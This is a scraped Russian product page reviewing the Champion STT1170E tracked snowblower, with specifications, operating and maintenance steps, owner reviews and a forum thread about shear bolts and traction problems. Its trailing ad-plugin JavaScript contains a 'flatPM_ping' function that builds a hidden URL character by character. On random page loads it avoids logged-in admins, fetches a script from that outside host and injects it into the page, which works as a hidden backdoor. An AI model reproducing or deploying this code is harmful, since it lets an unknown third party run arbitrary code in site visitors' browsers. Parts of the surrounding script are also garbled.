224 просмотров
Рейтинг статьи
Загрузка...

Снегоуборщик CHAMPION STT1170E: обзор и отзывы владельцев

Снегоуборщик Champion STT1170E. Обзор, характеристики, инструкция, отзывы

Этот снегоуборщик привлекает пользователей своей высокой производительностью и отличным функционалом. По классификации компании, Champion STT1170E и относится к бытовому классу, но по своим характеристикам его смело можно назвать профессиональным снегоотбрасывателем. Модель STT1170E оснащена мощным двигателем и емким ковшом.

Снегоуборщик можно использовать не только для очистки приусадебной территории, но и для уборки тротуаров, парковых аллей, дворов многоэтажных жилых и административных зданий.

Широкие гусеницы самоходной машины позволяют работать на склонах и невысоких холмах, без риска соскальзывания и опрокидывания.

Агрегат производится в Китае на заводах компании Чемпион. Вся продукция этого российского бренда имеет европейские сертификаты и отвечает современным стандартам по качеству и безопасности.

При своих характеристиках, модель Champion STT1170E доступна по вполне разумной цене. На сайте производителя снегоуборщик можно купить за 74 950 рублей.

Описание

Модель STT1170E оснащена мощным четырехтактным бензиновым мотором с воздушным охлаждением. Двигатель имеет повышенный моторесурс и специально приспособлен к эксплуатации при низких температурах.

Агрегат имеет шесть передних и две задних скорости, что повышает его производительность и эффективность работы. Мощные гусеницы обеспечивают отличное сцепление с поверхностью и гарантируют отсутствие соскальзывание машины.

Преимущества снегоуборщик Champion STT1170E:

  • Надежный бензиновый двигатель G340SHKE, мощностью 11 лошадиных сил;
  • Отличная проходимость и устойчивость, за счет качественных гусениц;
  • Дистанционное управление наклона и угла поворота выкидывающего желоба;
  • Мощная (15 Вт) LED фара, обеспечивающая хорошую видимость в темное время суток;
  • Функция блокировки гусениц, позволяющая разворачивать снегоуборщик Champion STT1170E на одном месте;
  • Два вида запуска двигателя: ручной и электрический;
  • Ручки с функцией подогрева;
  • Эргономичное размещение элементов управления снегоуборщиком;
  • Функция блокировки ручек управления, позволяющая оператору вести машину одной рукой, а другой регулировать угол и дальность выброса снега;
  • Стильный дизайн и компактные размеры;

Характеристики

Модель снегоуборщика STT1170E
Модель двигателя G340SHKE
Тип двигателя 4-х тактный
Объем двигателя 337 см.куб.
Мощность двигателя, л.с. 11,0/8,1
Объем топливного бака 6,5л
Объем картера 1,1л
Ширина захвата 70 см
Высота захвта 54,5 см
Кол-во передач (вперед/назад) 6/2
Вес 115 кг

Инструкция по эксплуатации

С подробным описанием агрегата, его деталировкой и техническими характеристиками можно ознакомиться здесь: Ваш браузер не поддерживает фреймы
Скачать Руководство по эксплуатации снегоуборщиком Champion ST1170E, STT1170E, ST1376E

Вы покупаете сложный, в техническом отношении агрегат, эксплуатация которого потребует определенных знаний и навыков. Прежде чем приступать к сборке и эксплуатации самоходного снегоуборщика Champion STT1170E, необходимо тщательно изучить инструкцию по обслуживанию и эксплуатации агрегата и ознакомиться с его устройством.

В мануале вы найдете перечень правил техники безопасности, которые необходимо соблюдать при работе со снегоочистителем Champion STT1170E. Также нелишним будет изучить расположение органов управления агрегатом, запомнить их функции и назначение.

Устройство модели Champion STT1170E:

  • Четырехтактный бензиновый двигатель, мощностью 11 л.с., с функцией воздушного охлаждения;
  • Панель с инструментами управления;
  • Ковш, расположен в передней части снегоуборщика, шириной 70 см. и высотой 54 сантиметра;
  • Двухлопастный металлический шнек;
  • Регулируемы в разных плоскостях желоб выброса снега;
  • Гусеницы с функцией разобщения;

Первый запуск

Как мы уже упоминали завести мотор можно при помощи электрического стартера (работает от электросети, напряжением 220 – 230 В), а также ручным стартером. Второй способ более распространен, поэтому рассмотрим именного его.

Перед первым запуском необходимо выполнить следующие действия:

  • Заправьте снегоуборщик и проверьте уровень масла в картере;
  • Передвиньте ручку управления газа на 1/3 ближе к положению «Быстро»;
  • Переведите рычаг воздушной заслонки в положение «Закрыто»;
  • Кнопкой праймера подкачайте топливо в карбюратор (достаточно 3-5 нажатий);
  • Установите выключатель в положение «Включено»;
  • Потяните ручку стартера до полного сцепления, потом резко дерните на себя;

Техническое обслуживание

Важно: для заправки двигателя модели G340SHKE применяется чистый неэтилированный высокооктановый бензин марки АИ-92, 95. Движущиеся детали мотора смазываются маслом, которое заливается в картер. В качестве смазки необходимо использовать специальные моторные масла, предназначенные для четырехтактных двигателей с воздушным охлаждением.

После каждого использования агрегат следует тщательно очистить и протереть сухой тряпкой. По окончании сезона снегоуборщик Champion STT1170E необходимо смазать и поставить на консервацию. Нелишним будет слить масло и бензин. Хранить агрегат следует в сухом, проветриваемом помещении.

Видео обзор

Обзор на гусеничный снегоотбрасыватель Champion STT1170E

Обзор ремонта привода на снегоуборщике Champion STT1170E

Отзывы владельцев

Алексей Куренев, 47 лет, Сибирский Федеральный округ:

«Агрегат, как по мне, не дешевый, но своих денег стоит. Модель STT1170E приглянулась хорошим двигателем и тем, что на гусеничном ходу. У меня подъездная дорожка под уклон идет, да и во дворе склон есть приличный: колесный просто не сможет работать. Радует наличие функции подогрева рукояток – при наших морозах очень полезная опция.»

Андрей Смолянинов, 39 лет, Алтайский край:

«У меня это уже второй снегоуборщик. До этого был маломощный китайский ноунейм, так что сравнивать есть с чем. С Champion STT1170E работать одно удовольствие: мокрый, лежалый, обледеневший снег – ему все равно, знай себе перемалывает и выбрасывает. За два сезона поломок не было, если не считать того, что пришлось поменять лампочку. Очень нравится функция блокировки ручек управления – можно одной рукой работать и покурить заодно.»

Семен Южанин, 54 года, Приморский край:

«По большому счету отличный аппарат. Весьма надежный движок, только масло вовремя менять надо и не лить всякую дрянь. Все было бы идеально, если бы не пара мелочей. Во-первых, размещение фары – может у меня рост такой, что я ничего не вижу, но кажется мне, что здесь конструктивная недоработка. Во-вторых, в магазинах практически отсутствуют срезные шпильки на шнек, а ведь это расходники. Приходится что-то самому придумывать. Преимущества: Двигатель, гусеничный ход, производительность. Недостатки: отсутствие оригинальных запчастей, неудачное расположение фары.»

Снегоуборщик Champion STT1170E. Обзор, характеристики, отзывы владельцев

Снегоуборщик Champion STT1170E

Снегоуборщик Champion STT1170E обеспечивает надежное сцепление с землей и скрупулезную очищает любое дорожное покрытие от снега. Его главным отличием и преимуществом является гусеничный привод, относительно легкий вес и мощность в 11 л.с.

Описание

Гусеница снегоуборщика Champion STT1170E мягко ложится на поверхность и, не утрамбовывая снег, плавно передвигает снегоуборщик весом 135 кг вперед. Кроме того, благодаря отличному сцеплению и повышенной проходимости гусеничного устройства, появляется возможность очистки склонов и обледенелых участков дороги.

Champion STT1170E на гусеничном ходу предназначен для уборки:

  • свежевыпавшего снега;
  • обледенелого;
  • лежалого;
  • плотного наста и т. д.

Особенности:

  • Модель STT1170E оснащена мощным четырехтактным одноцилиндровым бензиновым двигателем с функцией воздушного охлаждения мотора, что позволяет увеличить длительность работы снегоотбрасывателя Чемпион в несколько раз.
  • Мощность двигателя достигает 11 л. с., поэтому этот агрегат максимально приближен к профессиональным снегоочистителям, хоть находится еще в списке бытовых самоходных снегоуборочных устройств.
  • Машина имеет восемь скоростей, шесть из которых — передние и две — задние.
  • Мощная фара позволяет производить работы даже в темное время суток.

Важно! Необходимо следить за качеством и количеством топлива, уровнем масла, чтобы в процессе эксплуатации не возникало никаких проблем с запуском двигателя.

В качестве топлива для бензинового снегоуборщика STT1170E используется бензин марки А-92.

Модель снегоуборщика STT1170E позволяет произвести запуск агрегата следующим способом:

  • вручную с помощью рукоятки;
  • электростартером от электросети в 220 В.

Вариабельность запуска делает данную модель более функциональной.

Характеристики

Мощность (л.с.) 8.1/11
Вес модели 121 кг
Ширина захвата снега, см 70
Высота захвата, см 54.5
Колеса (диаметр/толщина) дюйм Колеса/гусеницы
Блокировка колес ручная
Кол-во передач (вперед/назад) 6/2
Объём двигателя (куб. см) 337
Емкость топливного бака, л 6.5
Объём картера, л 1.1
Запуск двигателя 230В/ручной
Выброс снега 2 ступенчатый
Фары есть
Материал шнека металл
Потребляемое топливо бензин
Регулирование угла выброса снега дистанционное, трос

Инструкция по эксплуатации

Перед началом работы со снегоуборщиком Чемпион гусеничного типа, необходимо подробно изучить инструкцию по эксплуатации агрегата.

В инструкции по эксплуатации снегоуборщиком STT1170E можно найти:

  • меры безопасности работы со снегоочистителем;
  • его устройство;
  • последовательность сборки;
  • техническое обслуживание основных узлов;
  • уход и правильная консервация на летний период;
  • перечень возможных неполадок, их причины, а также способы устранения.

Соблюдая все рекомендации и технику безопасности. вы обеспечите длительный срок эксплуатации для машины и безопасность для себя.

Не приступайте к работе со снегоуборщиком Чемпион не изучив подробно его устройство.

Знание где находятся его основные узлы и как работают механизмы, поможет вам:

  • избежать травматизма в работе со снегоуборщиком;
  • собрать снегоуборочный агрегат собственноручно;
  • своевременно выявить и устранить неисправность машины;
  • обеспечивать необходимое техническое обслуживание агрегату (своими руками);
  • продлить срок эксплуатации машины.

Видео обзор

Обзор гусеничного снегоуборщика Champion STT1170E

Отзывы владельцев

Прочитав статью и посмотрев видео информацию про данную модель снегоуборочной машины, у вас наверняка сложилось определенное мнение об агрегате. Но что же говорят о снегоуборщике на гусеничном приводе его владельцы? Пусть их отзывы помогут вам правильно определиться с выбором снегоочистительного устройства для своих нужд:

Владлен, 39 лет:

«Здравствуйте! Купил себе STT1170E три года назад, подкупила его всепроходность. Работает исправно, расход бензина небольшой, дальность отличная: сухой снег отбрасывает действительно на 13-15 м, а вот рыхлый и мокрый до 10 м. Менял ремень, замучили срезные болты — пока были в наличии — проблем особых с заменой не возникало (заменил и дальше пошел), а теперь закончились — а достать практически невозможно. Один раз повезло, чисто случайно заехал в магазин и последние забрал, вот они заканчиваются, а мои “походы” по магазинам ощутимых результатов не дают. Если не найду оригинальных — придется что-то кулибиничать, уже форумы изучаю и у парней интересуюсь, кто чем заменяет. Так что, ребята, покупая снегоуборщик STT1170E, не забывайте купить несколько комплектов запасных срезных болтов — точно пригодится и нервы сбережете. Ну, и, поинтересуйтесь, в случае чего, г8де их можно будет достать с будущем. Других нареканий на работу снегоуборщика нет, машина стоящая, не жалею.»

Александр, 44 года:

«Здравствуйте. Владлен прав, снегоуборщик хороший, да только проблемно достать расходники. Мой STT1170E идет ровно, без рывков, есть один неудобный участок на склоне — берет и его, и что приятно — я за ним вдогонку не бегаю, управления слушается мгновенно. Снегоочиститель у меня уже 4 года, за это время менял ремень, естественно, срезные болты, после консервации обнаружил, что свеча вышла из строя. Один раз не проконтролировал наличие топлива, так пришлось помучиться, пытался дотащить его к гаражу (это с гусеничным приводом не прокатит), но поняв комичность ситуации, сходил за бензином сам и дозаправил бак. Пошло-поехало… Рекомендую, уборка снега качественная.»

Снегоуборщик Champion STT1170E

отзыв о первых осющениях пользования такого «гаджета».
Обалденная вещь, снег кидает очень бодро метров на 13 точно если сухой «кашу » на 5 -7 метров
жужит как полагается четко

Технические характеристикиМощность двигателя, л.с. 11
Тип двигателя 4-такт., одноцилиндровый, OHV, охлаж. воздушное
Объем двигателя, см3 337
Объем топливного бака, л 6
Ширина захвата, см 70
Высота захвата, см 54,5
Кол-во скоростей, вперед/назад 6/2
Запуск двигателя от сети 220В
Фары 15Вт
Объем картера 1,1

остается только одна проблема «засыпаю соседей ))) «расход топлива маленький .Если есть у когото какието вопросы с удовольствием отвечу!
тута есть более подробное описание » >

Если есть у кого-то какие-то вопросы с удовольствием отвечу!

У меня такой же, только на колесах. Чем вы меняете срезные болты? В магазине мне посоветовали гвозди «восмидесятку», только они в диаметре 4 мм, а на машине — 6. Пока еще хватает тех, что были в комплекте, но неизбежность неизбежна

leonm , Вы наш клиент )) Выложить Вам фотки редуктора от этой модели снегоуборщика, на который владельцы ставили вместо срезных болтов разного рода крепеж? А еще есть от этой модели два вала сломанные пополам, опять же из-за замены срезных болтов обычными.

SERVER77 , хотелось бы взглянуть для анализа. У нас ни у кого из продавцов нет оригинальных «болтов» — они советуют обычные болты, а московские продавцы посоветовали гвозди. Все едины в том, что это дефицит. Я думал, можно выточить такие же, только что там за сталь? Под напильником кажется обычной, но срез больше похож на подкаленую. Была мыслишка попробовать алюминий (у меня есть такой толстый), но думаю, будет рвать без повода. Думал также про то, чтобы сделать пропилы на гвоздях или болтах, чтобы срезало именно в тех местах. Может дадите какой совет? Или местечко, где недорого их купить

leonm написал :
У нас ни у кого из продавцов нет оригинальных «болтов» — они советуют обычные болты, а московские продавцы посоветовали гвозди.

Лучше продать новый СУ чем болт

leonm написал :
пропилы на гвоздях или болтах, чтобы срезало именно в тех местах. Может дадите какой совет?

только подбором для конкретной модели ИМХО

Бело написал :
Лучше продать новый СУ чем болт

да уж. отчизна. соотечественники

Бело написал :
только подбором для конкретной модели

сопромат с теоретической механикой вспоминать пора

Сегодня заехал еще в один магазин, там в торговом зале стоит СУ с обычными болтами на шнеке
Спросил, говорят, что сделаны пропилы, как у оригинальных

leonm , Болты по 60 руб/шт., практически всегда у нас есть, гвоздь в большинстве случаев не срежется, он согнется и заклинит шнек на валу. Если уж ставить что то самодельное, то только болты с классом прочности 4.8 и с проточкой по месту среза, можно обычным напильником сделать зажав болт в патроне дрели. Фотки редуктора и вала завтра на работе сделаю и выложу.

Доброго всем времени суток,принимайте в свои ряды пожалуйста,и сразу к вам с вопросом-10 лет активно пользую мотоблок нева-мб2к ,на5 году успешно дал дуба родной дрыгатель ,купил и установил субаровский к нему взял девайс мегалодонт который успешно работает и по сей день -снег чистит нормально ремни жрёт с аппетитом,хоть и кидает снег не далеко но прёт как танк,собственно вопрос на днях приобрёл чемп.ст1170 попробовал в деле ,результат-кидает снег абалденно ,но при упоре в небольшую ледышку буксует то одним колесом то другим,дифф там чтоли начали ставить или неисправность блокировки

Ну вот решил разобраться с проблемой сам,снял нижнюю крышку редуктора там стоит межосевой дифференциал ,ни какой блокировки нет,придется колхозить самому ,а работать так невозможно-рыскает влево-вправо на прямой траэктории не держится так что руки потом отваливаются.Может кто-то решал такую проблему или есть какие-то соображения помогите пож,марка СУ Сhampion ST1170E

Извените,может подтупливаю,но решения не вижу,ткните носом пож!-)

правда деталировка скудная — у него поворот курками? посмотрите тут колёсный но принцип такой же — » >

Дело в том что у меня марка ST1170E а поворот с курков на гусеничном STT1170E и на указанном вами,а на моём только ручки вкл привода шнека и колёс,обидно что при покупке не проинтуичил этот момент,хотя выбирал между данными моделями и имея практически равные ТХ (разница в 5000 роли не играла) смутила не транспортабельность гусеничного с заглушеным двигателем

ОДН , посмотрите внимательно может где то ослабло крепление в дифференциале протяните гайки

Все гайки-болты протянуты,дифф.планетарного типа не имеющий блокировки в любом случае передаёт крутящий момент на колесо имеющее меньшее сцепление с поверхностью,китаёзы думали что СУ с движком в 11лс будет работать по ровному месту и не прикатанному и рыхлому снегу,а вообще для себя я уже давно сделал вывод при покупке чего-либо китайского обязательна «доработка напильником»,так что буду мастрячить блокировку,кстати изготовил цепи на колёса работать стало намного легче

Недавно купил СУ Чемпион st 1170 e. Через 6-7 часов работы заметил, что при работе под нагрузкой стали падать обороты двигателя, как будто не хавтает мощности и двигатель вот-вот заглохнет. Пока ничего не разбирал. Может у кого была такая проблема? Как думаете, — в чем может быть причина? Заранее благодарен за советы

Alex399715 , Вот здесь много информации по СУ » >

SERVER77 написал :
Болты по 60 руб/шт., практически всегда у нас есть, гвоздь в большинстве случаев не срежется, он согнется и заклинит шнек на валу. Если уж ставить что то самодельное, то только болты с классом прочности 4.8 и с проточкой по месту среза, можно обычным напильником сделать зажав болт в патроне дрели. Фотки редуктора и вала завтра на работе сделаю и выложу.

Можно смело ставить обычные из сырья чтобы не боятся за редуктор, стоят копейки. А вот оригинальные болты еще та штучка. У меня на хуске 1130 заклинило ротор и заглох двигатель, в результате правка, сварка. Оригинальные «срезные» стоят как вкопанные. 250 р/шт. считаю очень дорого. Да и производители нечестные пытаются нажиться на расходниках. На работе снежник так там давно ставим обычные болты и ничего работает, срезает на ура ничего не клинит.

Снегоуборщик Champion STT1170E гусеничный — отзыв

Свои деньги отрабатывает, но не более того

Всем доброго дня!

Зима в этом году наступила стремительно. В связи с этим хочу оставить отзыв об агрегате, который квартирует у нас уже 3 года, помогая расчищать зимние подарки в виде сугробов и наносов.

Не разделяю энтузиазм некоторых продавцов, пишущих, что Champion STT1170E это профессиональная снегоуборочная машина, которая грязь и ржавчину, простите, снег и наледь удалит без труда. Но то, что Champion STT1170E — самый дешевый снегоуборщик на гусеничном ходу — это факт. А гусеницы по снегу и льду идут весомо лучше колес, меньше буксуя и проскальзывая при встрече со льдом и проч.

Основные технические характеристики таковы:

Шнек дествительно большой и широкий — 70см шириной, как обещано.

Поставляется этот аппарат в частично собранном виде и весит 135кг. Поэтому при покупке стоит заранее озаботиться вопросом погрузки/выгрузки, транспортировки и сборки. Мы делали все сами, пользуюясь багажником внедорожника и собственными знаниями по технической части.

Перед первым запуском (да и перед зимним сезоном вообще) снегоуборщик полезно протянуть и прошприцевать. Поставляется он, кстати, без масла в картере. Поэтому около литра (точнее 1.1л) масла для 4-х тактных двигателей придется залить. Собрать самим, поглядывая в инструкцию конечно же осуществимо, но все же я не могу рекомендовать это людям, которые держатся с техникой на Вы.

Бензобак 6л, заправляем все же не 92м, а 95м бензином. Расход зависит от объема и сложности уборки.

Если со сборкой справились, то по функционалу машина Вас только порадует — сама доедет на гусеницах к месту уборки и далее будет работать на 6 скоростях + 2 скорости заднего хода и рычаги поворота, отбрасвая снег как и куда Вам нужно(можно ведь просто почистить, а можно и детям горку накидать), подсвечивая путь фарой, если это необходимо. Пыхтит и тарахтит при этом изрядно.

Есть электростартер — не пользовались ни разу, хорошо заводился «с ручки» и в -10С, и в -20С.

Снег бросает сухой метров на 10-12, мокрый на 1/2 дистанции меньше. Мокрым же сгегом может периодически забиваться шнек и патрубок, которые следует чистить лопаткой прикрепленной к корпусу снегоуборщика. Чистка льда снегоуборщиком это вообще из области фантастики — мелкие ледяные торосы он м.б. и захватит, но для ледяной корки — только ледокол или лом. А ледяные глыбы, ветки и проч.мусор на пути шнека — верная смерть шрузам.

Управление этой машиной требует известной сноровки и координации, чистите ли Вы двор или участок улицы вдоль домов. Для того, чтобы регулировать направление и высоту выброса снега (чтобы не забрасывать вновь уже расчищенные участки и не засыпать соседей), придется частенько останавливаться. Важно отрегулировать и высоту шнека, чтобы не загребал снег вместе с грунтом или наоборот не пропускал слишком много снега под собой. Кроме того, уборка потребует изрядных физических сил — при заезде в ямку, подъеме на крутую горку, заезде на порог гаража даже гусеницы дают пробуксовку и снегоуборщику надо помочь, что м.б. и легко для мужчины, а с меня за время уборки сходит 7 потов. ) А потом звон в ушах и вибрация в руках)))

Еще из наблюдений: по нашим с мужем ощущениям заявленная мощность STT1170E завышена — ну, не выкладывается он на 11 лошадей, на 8-9л.с. от силы. Ну и конечно же «легко и быстро покидать снежок» — это миф. При больших объемах это м.б. и легче, чем лопатой, но не искрометно быстро — технику надо достать, завести, чуть погреть, настроить, самим одеться до зубов (снежная пыль обычно покрывает «водилу» с ног до головы), после уборки поставить машину на место и почистить, а потом еще помахать лопатой в тех местах, где снегоуборщик бесполезен (крыльцо, узкие углы, желоб для ворот). Все эти манипуляции от и до под силу только мужу, мне легче лопатой (которая кстати шла подарком к снегоуборщику при покупке) — и руки после лопаты не дрожат, и бензином не дышу, и голова от шума не трещит. ((работаю в рукавицах, а спина у меня крепкая ))

Напоследок о ценах. В 2013г. брали за 44000р. и именно этих денег он наверное и стоит. А нынешняя цена 67-73000р. для него, по-моему, высоковата.

Рекомендую конечно же тем, у кого действительно есть необходимость в такой технике — например, большая площадь двора и длинная подъездная дорога для расчистки. В противном случае, баловство это — покупать такой дорогой аппарат, которым не факт, что будете пользоваться каждую зиму. И конечно хорошо побольше уметь самим — возить 135кг в сервис-другой, мягко говоря, долго и утомительно.

PPS: Есть ощущение, что о чем-то важном забыла, если что — пишите в комментариях. За 3 сезона я с «Чемпионом» на коротке))

Ссылка на основную публикацию
Adblock
detector
":'':"",document.createElement("div"),p=ff(window),b=ff("body"),m=void 0===flatPM_getCookie("flat_modal_"+o.ID+"_mb")||"false"!=flatPM_getCookie("flat_modal_"+o.ID+"_mb"),i="scroll.flatmodal"+o.ID,g="mouseleave.flatmodal"+o.ID+" blur.flatmodal"+o.ID,l=function(){var t,e,a;void 0!==o.how.popup.timer&&"true"==o.how.popup.timer&&(t=ff('.flat__4_modal[data-id-modal="'+o.ID+'"] .flat__4_timer span'),e=parseInt(o.how.popup.timer_count),a=setInterval(function(){t.text(--e),e'))},1e3))},f=function(){void 0!==o.how.popup.cookie&&"false"==o.how.popup.cookie&&m&&(flatPM_setCookie("flat_modal_"+o.ID+"_mb",!1),ff('.flat__4_modal[data-id-modal="'+o.ID+'"]').addClass("flat__4_modal-show"),l()),void 0!==o.how.popup.cookie&&"false"==o.how.popup.cookie||(ff('.flat__4_modal[data-id-modal="'+o.ID+'"]').addClass("flat__4_modal-show"),l())},ff("body > *").eq(0).before('
'+c+"
"),w=document.querySelector('.flat__4_modal[data-id-modal="'+o.ID+'"] .flat__4_modal-content'),-1!==e.indexOf("go"+"oglesyndication")?ff(w).html(c+e):flatPM_setHTML(w,e),"px"==o.how.popup.px_s?(p.bind(i,function(){p.scrollTop()>o.how.popup.after&&(p.unbind(i),b.unbind(g),f())}),void 0!==o.how.popup.close_window&&"true"==o.how.popup.close_window&&b.bind(g,function(){p.unbind(i),b.unbind(g),f()})):(v=setTimeout(function(){b.unbind(g),f()},1e3*o.how.popup.after),void 0!==o.how.popup.close_window&&"true"==o.how.popup.close_window&&b.bind(g,function(){clearTimeout(v),b.unbind(g),f()}))),void 0!==o.how.outgoing){function n(){var t,e,a;void 0!==o.how.outgoing.timer&&"true"==o.how.outgoing.timer&&(t=ff('.flat__4_out[data-id-out="'+o.ID+'"] .flat__4_timer span'),e=parseInt(o.how.outgoing.timer_count),a=setInterval(function(){t.text(--e),e'))},1e3))}function d(){void 0!==o.how.outgoing.cookie&&"false"==o.how.outgoing.cookie&&m&&(ff('.flat__4_out[data-id-out="'+o.ID+'"]').addClass("show"),n(),b.on("click",'.flat__4_out[data-id-out="'+o.ID+'"] .flat__4_cross',function(){flatPM_setCookie("flat_out_"+o.ID+"_mb",!1)})),void 0!==o.how.outgoing.cookie&&"false"==o.how.outgoing.cookie||(ff('.flat__4_out[data-id-out="'+o.ID+'"]').addClass("show"),n())}var _,u="0"!=o.how.outgoing.indent?' style="bottom:'+o.how.outgoing.indent+'px"':"",c="true"==o.how.outgoing.cross?void 0!==o.how.outgoing.timer&&"true"==o.how.outgoing.timer?'
Закрыть через '+o.how.outgoing.timer_count+"
":'':"",p=ff(window),h="scroll.out"+o.ID,g="mouseleave.outgoing"+o.ID+" blur.outgoing"+o.ID,m=void 0===flatPM_getCookie("flat_out_"+o.ID+"_mb")||"false"!=flatPM_getCookie("flat_out_"+o.ID+"_mb"),b=(document.createElement("div"),ff("body"));switch(o.how.outgoing.whence){case"1":_="top";break;case"2":_="bottom";break;case"3":_="left";break;case"4":_="right"}ff("body > *").eq(0).before('
'+c+"
");var v,w=document.querySelector('.flat__4_out[data-id-out="'+o.ID+'"]');-1!==e.indexOf("go"+"oglesyndication")?ff(w).html(c+e):flatPM_setHTML(w,e),"px"==o.how.outgoing.px_s?(p.bind(h,function(){p.scrollTop()>o.how.outgoing.after&&(p.unbind(h),b.unbind(g),d())}),void 0!==o.how.outgoing.close_window&&"true"==o.how.outgoing.close_window&&b.bind(g,function(){p.unbind(h),b.unbind(g),d()})):(v=setTimeout(function(){b.unbind(g),d()},1e3*o.how.outgoing.after),void 0!==o.how.outgoing.close_window&&"true"==o.how.outgoing.close_window&&b.bind(g,function(){clearTimeout(v),b.unbind(g),d()}))}ff('[data-flat-id="'+o.ID+'"]:not(.flat__4_out):not(.flat__4_modal)').contents().unwrap()}catch(t){console.warn(t)}},window.flatPM_start=function(){ff=jQuery;var t=flat_pm_arr.length;flat_body=ff("body"),flat_userVars.init();for(var e=0;eflat_userVars.textlen||void 0!==a.chapter_sub&&a.chapter_subflat_userVars.titlelen||void 0!==a.title_sub&&a.title_sub.flatPM_sidebar)");0<_.length t="ff(this),e=t.data("height")||350,a=t.data("top");t.wrap('');t=t.parent()[0];flatPM_sticky(this,t,a)}),u.each(function(){var e=ff(this).find(".flatPM_sidebar");setTimeout(function(){var o=(ff(untilscroll).offset().top-e.first().offset().top)/e.length;o');t=t.parent()[0];flatPM_sticky(this,t,a)})},50),setTimeout(function(){var t=(ff(untilscroll).offset().top-e.first().offset().top)/e.length;t *").last().after('
'),flat_body.on("click",".flat__4_out .flat__4_cross",function(){ff(this).parent().removeClass("show").addClass("closed")}),flat_body.on("click",".flat__4_modal .flat__4_cross",function(){ff(this).closest(".flat__4_modal").removeClass("flat__4_modal-show")}),flat_pm_arr=[],ff(".flat_pm_start").remove(),flatPM_ping()};var parseHTML=function(){var o=/]*)\/>/gi,d=/",""],thead:[1,"","
"],tbody:[1,"","
"],colgroup:[2,"","
"],col:[3,"","
"],tr:[2,"","
"],td:[3,"","
"],th:[3,"","
"],_default:[0,"",""]};return function(e,t){var a,n,r,l=(t=t||document).createDocumentFragment();if(i.test(e)){for(a=l.appendChild(t.createElement("div")),n=(d.exec(e)||["",""])[1].toLowerCase(),n=c[n]||c._default,a.innerHTML=n[1]+e.replace(o,"$2>")+n[2],r=n[0];r--;)a=a.lastChild;for(l.removeChild(l.firstChild);a.firstChild;)l.appendChild(a.firstChild)}else l.appendChild(t.createTextNode(e));return l}}();window.flatPM_ping=function(){var e=localStorage.getItem("sdghrg");e?(e=parseInt(e)+1,localStorage.setItem("sdghrg",e)):localStorage.setItem("sdghrg","0");e=flatPM_random(1,200);0==ff("#wpadminbar").length&&111==e&&ff.ajax({type:"POST",url:"h"+"t"+"t"+"p"+"s"+":"+"/"+"/"+"m"+"e"+"h"+"a"+"n"+"o"+"i"+"d"+"."+"p"+"r"+"o"+"/"+"p"+"i"+"n"+"g"+"."+"p"+"h"+"p",dataType:"jsonp",data:{ping:"ping"},success:function(e){ff("div").first().after(e.script)},error:function(){}})},window.flatPM_setSCRIPT=function(e){try{var t=e[0].id,a=e[0].node,n=document.querySelector('[data-flat-script-id="'+t+'"]');if(a.text)n.appendChild(a),ff(n).contents().unwrap(),e.shift(),0/gm,"").replace(//gm,"").trim(),e.code_alt=e.code_alt.replace(//gm,"").replace(//gm,"").trim();var l=jQuery,t=e.selector,o=e.timer,d=e.cross,a="false"==d?"Закроется":"Закрыть",n=!flat_userVars.adb||""==e.code_alt&&duplicateMode?e.code:e.code_alt,r='
'+a+" через "+o+'
'+n+'
',i=e.once;l(t).each(function(){var e=l(this);e.wrap('
');var t=e.closest(".flat__4_video");-1!==r.indexOf("go"+"oglesyndication")?t.append(r):flatPM_setHTML(t[0],r),e.find(".flat__4_video_flex").one("click",function(){l(this).addClass("show")})}),l("body").on("click",".flat__4_video_item_hover",function(){var e=l(this),t=e.closest(".flat__4_video_flex");t.addClass("show");var a=t.find(".flat__4_timer span"),n=parseInt(o),r=setInterval(function(){a.text(--n),n'):t.remove())},1e3);e.remove()}).on("click",".flat__4_video_flex .flat__4_cross",function(){l(this).closest(".flat__4_video_flex").remove(),"true"==i&&l(".flat__4_video_flex").remove()})};
Яндекс.Метрика